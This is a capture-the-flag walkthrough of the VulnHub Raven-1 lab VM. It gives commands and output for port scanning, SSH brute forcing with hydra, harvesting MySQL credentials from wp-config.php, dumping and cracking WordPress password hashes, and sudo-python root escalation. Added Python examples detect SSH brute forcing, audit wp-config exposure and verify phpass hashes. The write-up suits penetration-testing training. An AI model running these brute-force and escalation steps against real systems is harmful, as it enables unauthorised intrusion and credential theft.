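Vulnhub Walkthrough Handbook: 03 Raven-1

Background:

Download: https://www.vulnhub.com/entry/raven-1,256/

The target VM's IP address in this walkthrough is 100.10.10.132. Add it to the hosts file, mapped to the domain name raven.local.

1. Information gathering

1.1 Finding the target host's IP

Use the arp-scan -l command to scan the local network for live hosts.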

└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:27:90, IPv4: 100.10.10.129
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
100.10.10.1     00:50:56:c0:00:08       VMware, Inc.
100.10.10.132   00:0c:29:5a:b1:05       VMware, Inc.
100.10.10.253   00:50:56:f5:d5:54       VMware, Inc.
100.10.10.254   00:50:56:e1:62:61       VMware, Inc.

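From the MAC address we can identify the target's IP address as 100.10.10.132.

1.2 Scanning the target host's open ports

Use nmap to scan the target's open ports, with the command nmap -sS -Pn -p 1-65535 100.10.10.132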

└─# nmap -sS -Pn -p 1-65535 100.10.10.132  
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-28 09:41 CST
Nmap scan report for 100.10.10.132
Host is up (0.00083s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
40396/tcp open  unknown
MAC Address: 00:0C:29:5A:B1:05 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 22.46 seconds

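The results show that the target has ports 22, 80, 111 and 40396 open.

2. Web site inspection

2.1 Getting the first flag

Information gathering showed that the target has port 80 open, so we browse the site and review the page source. The source of http://raven.local/service.html contains a flag: <!-- flag1{b9bbcb33e11b80be759c4e844862482d} -->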

2.2 WordPress scan

The page at http://raven.local/wordpress/ contains the string wordpress, so the site is presumably built on the WordPress CMS. We can therefore scan it with wpscan.

First update the vulnerability database.

wpscan --update

Then scan the URL.

wpscan --url http://raven.local/wordpress/

The scan results give the following:

server: Apache/2.4.10 (Debian)

WordPress version 4.8.17

Nothing exploitable turns up.

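2.3 SSH brute force

The site has the URL http://raven.local/wordpress/index.php/author/michael/, which reveals the username MICHAEL.

We can try brute-forcing the SSH service with this username.

Use hydra for the password brute force, with the classic fasttrack.txt as the wordlist.

hydra -l michael -P /usr/share/wordlists/fasttrack.txt ssh://raven.local

No password was found.

We run it again with a wordlist generated by cupp.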

└─# cupp -i
 ___________ 
   cupp.py!                 # Common
      \                     # User
       \   ,__,             # Passwords
        \  (oo)____         # Profiler
           (__)    )\   
              ||--|| *      [ Muris Kurgas | j0rgan@remote-exploit.org ]
                            [ Mebus | https://github.com/Mebus/]


[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)

> First Name: michael                    # enter the username
> Surname: michael                       # enter the username
> Nickname: michael                      # enter the username
> Birthdate (DDMMYYYY):   


> Partners) name: 
> Partners) nickname: 
> Partners) birthdate (DDMMYYYY): 


> Child's name: 
> Child's nickname: 
> Child's birthdate (DDMMYYYY): 


> Pet's name: 
> Company name: 


> Do you want to add some key words about the victim? Y/[N]: 
> Do you want to add special chars at the end of words? Y/[N]: 
> Do you want to add some random numbers at the end of words? Y/[N]:
> Leet mode? (i.e. leet = 1337) Y/[N]: 

[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to michael.txt, counting 60 words.
[+] Now load your pistolero with michael.txt and shoot! Good luck!

cupp writes the wordlist to the file michael.txt. Use that file for another brute-force run with the command hydra -l michael -P ./michael.txt ssh://raven.local.

└─# hydra -l michael -P ./michael.txt ssh://raven.local                     
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-28 14:49:30
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 60 login tries (l:1/p:60), ~4 tries per task
[DATA] attacking ssh://raven.local:22/
[22][ssh] host: raven.local   login: michael   password: michael
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 5 final worker threads did not complete until end.
[ERROR] 5 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-28 14:49:37

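The brute force found the account michael with the password michael.

Log in with this account and password. The command is ssh michael@raven.local. During the connection you are asked whether to continue connecting; enter yes.

└─# ssh michael@raven.local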
The authenticity of host 'raven.local (100.10.10.132)' can't be established.
ECDSA key fingerprint is SHA256:rCGKSPq0sUfa5mqn/8/M0T63OxqkEIR39pi835oSDo8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'raven.local' (ECDSA) to the list of known hosts.
michael@raven.local's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Mon Dec 27 18:25:22 2021 from 100.10.10.129
michael@Raven:~$ 
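
The hydra run above made 60 login attempts in about seven seconds and then logged in, a pattern that is easy to spot in sshd's auth log. The following detector is an added example, not part of the original walkthrough; the log lines are constructed in OpenSSH's usual format, and the threshold of 10 failures per 60 seconds is an assumed tuning value.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+")

def detect(lines, year=2021, threshold=10, window=timedelta(seconds=60)):
    """Return (kind, ip, user, time) alerts for password-guessing bursts."""
    recent = defaultdict(deque)   # source IP -> times of recent failures
    flagged = set()               # IPs already reported as guessing
    alerts = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        when = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        fails = recent[m["ip"]]
        while fails and when - fails[0] > window:
            fails.popleft()       # drop failures older than the window
        if m["result"] == "Failed":
            fails.append(when)
            if len(fails) >= threshold and m["ip"] not in flagged:
                flagged.add(m["ip"])
                alerts.append(("bruteforce", m["ip"], m["user"], when))
        elif len(fails) >= threshold:
            # A success right after a burst of failures: likely guessed password.
            alerts.append(("success_after_bruteforce", m["ip"], m["user"], when))
    return alerts

def constructed_log():
    """Constructed sample: one mistyped admin login, then a fast guessing run."""
    lines = [
        "Dec 28 14:40:02 Raven sshd[1990]: Failed password for steven from 100.10.10.1 port 50122 ssh2",
        "Dec 28 14:40:09 Raven sshd[1990]: Accepted password for steven from 100.10.10.1 port 50122 ssh2",
    ]
    for i in range(14):
        lines.append(f"Dec 28 14:49:{30 + i // 3:02d} Raven sshd[{2100 + i}]: "
                     f"Failed password for michael from 100.10.10.129 port {40100 + i} ssh2")
    lines.append("Dec 28 14:49:36 Raven sshd[2120]: Accepted password for michael "
                 "from 100.10.10.129 port 40120 ssh2")
    return lines

if __name__ == "__main__":
    for alert in detect(constructed_log()):
        print(*alert)
```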

3. Privilege escalation

3.1 Kernel version

Use the command uname -a to check the kernel version.

michael@Raven:~$ uname -a
Linux Raven 3.16.0-6-amd64 #1 SMP Debian 3.16.57-2 (2018-07-14) x86_64 GNU/Linux

No exploitable vulnerability was found.

3.2 SUID privilege escalation

List the SUID binaries.

michael@Raven:~$ find / -user root -perm -4000 -print 2>/dev/null
/bin/mount
/bin/umount
/bin/su
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/sudo
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/sensible-mda
/sbin/mount.nfs

Nothing exploitable here.

3.3 MySQL login

Browsing the site directory /var/www, we find the file flag2.txt.

michael@Raven:~$ cd /var/www
michael@Raven:/var/www$ ls
flag2.txt  html
michael@Raven:/var/www$ cat flag2.txt
flag2{fc3fd58dcdad9ab23faca6e9a36e581c}

Next, look at the site's configuration file /var/www/html/wordpress/wp-config.php

michael@Raven:/var/www/html/wordpress$ cat wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'R@v3nSecurity');

/** MySQL hostname */
define('DB_HOST', 'localhost');

This reveals the MySQL account root with the password R@v3nSecurity.

Connect to the MySQL database with the command mysql -h localhost -u root -pR@v3nSecurity.

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 68
Server version: 5.5.60-0+deb8u1 (Debian)

Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> 
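
The two conditions this step depended on, a WordPress database account that is MySQL root and a wp-config.php that an unprivileged local user can read, can be checked automatically. This audit script is an added example, not part of the original walkthrough; the sample config is constructed, wp_app is a hypothetical least-privilege account name, and the world-readable bit is assumed to be how the file was exposed.

```python
import os
import re
import stat
import tempfile

DEFINE = re.compile(r"""define\(\s*['"](\w+)['"]\s*,\s*['"]([^'"]*)['"]\s*\)""")

# Constructed sample modelled on the settings shown above; the password and
# the commented-out wp_app account are placeholders, not values from the page.
SAMPLE = """<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
// define('DB_USER', 'wp_app');
define('DB_PASSWORD', 'example-password');
define('DB_HOST', 'localhost');
"""

def active_settings(php_source):
    """Map define() names to values, ignoring commented-out code."""
    code = re.sub(r"/\*.*?\*/", "", php_source, flags=re.S)
    code = re.sub(r"^\s*(//|#).*$", "", code, flags=re.M)
    return dict(DEFINE.findall(code))

def audit_wp_config(path):
    """Return findings for a root DB account and a world-readable config."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        settings = active_settings(fh.read())
    findings = []
    if settings.get("DB_USER") == "root":
        findings.append("DB_USER is root: a leaked password exposes every database")
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & stat.S_IROTH:
        findings.append(f"mode {mode:04o}: any local account can read DB_PASSWORD")
    return findings

def write_sample(text, mode):
    """Write a constructed config to a temp file with the given permissions."""
    fd, path = tempfile.mkstemp(suffix=".php")
    with os.fdopen(fd, "w") as fh:
        fh.write(text)
    os.chmod(path, mode)
    return path

if __name__ == "__main__":
    weak = write_sample(SAMPLE, 0o644)
    fixed = write_sample(SAMPLE.replace("'root'", "'wp_app'"), 0o640)
    for label, path in (("weak", weak), ("hardened", fixed)):
        print(label, audit_wp_config(path))
        os.remove(path)
```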

3.4 Working with the database

Use the command show databases; to list the databases.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| wordpress          |
+--------------------+
4 rows in set (0.00 sec)

Use the command use wordpress to switch to the wordpress database.

mysql> use wordpress
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Use the command show tables to see which tables the current database contains.

mysql> show tables;
+-----------------------+
| Tables_in_wordpress   |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
12 rows in set (0.00 sec)

Use the command select * from wp_users to view the contents of the wp_users table.

mysql> select * from wp_users;
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| ID | user_login | user_pass                          | user_nicename | user_email        | user_url | user_registered     | user_activation_key | user_status | display_name   |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
|  1 | michael    | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 | michael       | michael@raven.org |          | 2018-08-12 22:49:12 |                     |           0 | michael        |
|  2 | steven     | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/ | steven        | steven@raven.org  |          | 2018-08-12 23:31:16 |                     |           0 | Steven Seagull |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
2 rows in set (0.00 sec)

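We find the username steven and its password $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/. The password is stored as a hash, not in plain text.

First export the usernames and password hashes to a text file.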

mysql> SELECT CONCAT(user_login, ":", user_pass) FROM wp_users INTO OUTFILE '/tmp/wordpress.txt';
Query OK, 2 rows affected (0.00 sec)

View the contents of the file.

michael@Raven:/usr/share$ cat /tmp/wordpress.txt
michael:$P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0
steven:$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/

3.5 File transfer

Start an HTTP service on the target host to transfer the wordpress.txt file. On the target, change to the /tmp directory and run the command python -m SimpleHTTPServer 8888

michael@Raven:/tmp$ python -m SimpleHTTPServer 8888
Serving HTTP on 0.0.0.0 port 8888 ...

On Kali, download wordpress.txt from the target host with the command wget http://raven.local:8888/wordpress.txt

└─# wget http://raven.local:8888/wordpress.txt  
--2021-12-28 16:27:32--  http://raven.local:8888/wordpress.txt
正在解析主机 raven.local (raven.local)... 100.10.10.132
正在连接 raven.local (raven.local)|100.10.10.132|:8888... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:85 [text/plain]
正在保存至: “wordpress.txt”

wordpress.txt                   100%[=====================================================>]      85  --.-KB/s  用时 0s      

2021-12-28 16:27:32 (1.47 MB/s) - 已保存 “wordpress.txt” [85/85])

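3.6 John password cracking

Use the well-known rockyou.txt wordlist (bundled with Kali) for password cracking. In the /usr/share/wordlists directory, run the following command to produce the rockyou.txt file.

└─# ls
dirb dirbuster fasttrack.txt fern-wifi metasploit nmap.lst rockyou.txt.gz
└─# gzip -d rockyou.txt.gz

On the Kali machine, change to the directory containing wordpress.txt and run the following command to crack the passwords with john.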

└─# john --wordlist=/usr/share/wordlists/rockyou.txt wordpress.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
pink84           (steven)

This gives the password pink84 for the steven account.

Connect remotely over SSH with this account, using the command ssh steven@raven.local

└─# ssh steven@raven.local                                                   
steven@raven.local's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Dec 27 18:43:33 2021 from 100.10.10.129

Check which user we are running as.

$ whoami
steven
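
john's banner in section 3.6 (phpass, iteration count 8192) can be read straight from the stored hash: the fourth character encodes the cost and the next eight are the salt. The added example below, not part of the original walkthrough, is written from the published phpass portable-hash algorithm; it parses the hash from wp_users and recomputes it, showing that each guess costs only 8193 MD5 calls, which is why a short dictionary password offers no protection once the table leaks.

```python
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
STEVEN = "$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/"   # hash shown in wp_users above

def parse_phpass(stored):
    """Split a portable phpass hash into (iterations, salt, encoded digest)."""
    if len(stored) != 34 or stored[:3] not in ("$P$", "$H$"):
        raise ValueError("not a portable phpass hash")
    # The cost character is log2 of the iteration count: 'B' is index 13.
    return 1 << ITOA64.index(stored[3]), stored[4:12], stored[12:]

def encode64(data):
    """phpass's base64 variant: little-endian 24-bit groups, ITOA64 alphabet."""
    out = []
    for start in range(0, len(data), 3):
        chunk = data[start:start + 3]
        value = int.from_bytes(chunk, "little")
        # 1 byte -> 2 chars, 2 bytes -> 3 chars, 3 bytes -> 4 chars
        for shift in range(0, 6 * (len(chunk) + 1), 6):
            out.append(ITOA64[(value >> shift) & 0x3F])
    return "".join(out)

def phpass_hash(password, setting):
    """Recompute the hash for password using the cost and salt in setting."""
    iterations, salt, _ = parse_phpass(setting)
    pw = password.encode("utf-8")
    digest = hashlib.md5(salt.encode("ascii") + pw).digest()
    for _ in range(iterations):
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + encode64(digest)

def phpass_verify(password, stored):
    """Constant-time comparison of the recomputed and stored hash strings."""
    return hmac.compare_digest(phpass_hash(password, stored), stored)

if __name__ == "__main__":
    iterations, salt, _ = parse_phpass(STEVEN)
    print("iterations:", iterations, "salt:", salt)
    print("pink84 matches:", phpass_verify("pink84", STEVEN))
```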

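3.7 SUDO privilege escalation

Try escalating privileges through sudo and Python.

The command sudo python3 -c 'import pty; pty.spawn("/bin/sh")' fails to escalate privileges.

The command sudo python -c 'import os; os.system("/bin/sh")' escalates privileges successfully.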

$ sudo python -c 'import os; os.system("/bin/sh")'
# whoami
root

Change to the /root directory and view the last flag.

# cd /root
# ls
flag4.txt
# cat flag4.txt
______                      
| ___ \                     
| |_/ /__ ___   _____ _ __  
|    // _` \ \ / / _ \ '_ \ 
| |\ \ (_| |\ V /  __/ | | |
\_| \_\__,_| \_/ \___|_| |_|

flag4{715dea6c055b9fe3337544932f2941ce}

CONGRATULATIONS on successfully rooting Raven!

This is my first Boot2Root VM - I hope you enjoyed it.

Hit me up on Twitter and let me know what you thought: 

@mccannwj / wjmccann.github.io